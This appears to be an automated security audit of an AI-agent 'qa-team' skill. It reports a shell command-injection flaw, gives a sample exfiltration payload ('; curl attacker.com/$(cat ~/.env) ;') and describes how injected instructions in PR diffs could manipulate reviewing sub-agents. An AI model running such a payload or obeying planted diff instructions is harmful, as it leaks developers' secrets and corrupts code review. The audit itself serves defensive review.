Skills
skills/posthog/posthog-foss/qa-team/Gen Agent Trust Hub

qa-team

Fail

Audited by Gen Agent Trust Hub on Jun 24, 2026

Risk Level: HIGHCOMMAND_EXECUTIONPROMPT_INJECTION
Full Analysis
  • [COMMAND_EXECUTION]: Shell command injection vulnerability in the initial data gathering phase.
  • Evidence: In SKILL.md, Step 1 uses $ARGUMENTS to define the <base> branch in the command git diff <base>...HEAD --name-only.
  • Risk: An attacker providing a branch name containing shell metacharacters (e.g., ; curl attacker.com/$(cat ~/.env) ;) can execute arbitrary commands in the agent's environment.
  • [PROMPT_INJECTION]: Susceptibility to Indirect Prompt Injection (Category 8).
  • Ingestion points: The skill executes git diff to collect untrusted data from the current branch in SKILL.md (Step 1).
  • Boundary markers: The diff content is interpolated into agent prompts using markdown headers (e.g., ### Full diff) but lacks robust escaping or 'ignore' instructions for the sub-agents.
  • Capability inventory: The specialist agents launched via the Agent tool have access to the Read tool, while the orchestrating agent has Write and shell access.
  • Sanitization: No sanitization is performed on the diff content before it is passed to the specialist or generalist agents. Malicious instructions embedded in code comments within a PR could subvert the review process or manipulate the final QAREPORT.md verdict.
  • [DATA_EXFILTRATION]: Risk of unauthorized file modification.
  • Evidence: The skill automatically writes a synthesis report to QAREPORT.md in the repository root.
  • Risk: Combined with the prompt injection vulnerability, an attacker could potentially force the agent to write malicious content or secrets into the repository's documentation.
Recommendations
  • AI detected serious security threats
Audit Metadata
Risk Level
HIGH
Analyzed
Jun 24, 2026, 06:17 PM
Security Audit — agent-trust-hub — qa-team